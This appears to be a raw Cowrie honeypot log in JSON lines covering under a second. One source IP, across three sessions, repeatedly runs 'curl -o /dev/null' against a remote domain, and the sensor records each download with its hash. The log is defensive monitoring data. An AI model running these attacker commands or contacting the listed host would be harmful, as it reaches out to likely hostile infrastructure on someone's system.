{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.559810Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.561430Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.562361Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.564651Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.565555Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.570327Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.598128Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.598920Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.601986Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.604248Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.606443Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.609605Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.611455Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.612405Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.614006Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.615368Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.643452Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.646032Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.650365Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.651138Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.687414Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.688336Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.690526Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.691467Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.695130Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.698414Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.700644Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.703127Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.729758Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.730540Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.758989Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.759749Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.762264Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.763039Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.767470Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.768744Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.769350Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.773424Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.798855Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.799572Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.802930Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.805749Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.806626Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.808653Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.809571Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.836266Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.840033Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.844410Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.846030Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.847259Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.850745Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.855033Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.856169Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.858521Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.859535Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.900724Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.901758Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.902295Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.904230Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.905008Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.908343Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.910444Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.911249Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.948461Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.950356Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.951328Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.954159Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.955169Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:54.956433Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.957257Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.960799Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.963247Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.991635Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.993790Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.996564Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:54.999982Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.002232Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:55.003140Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:55.005060Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
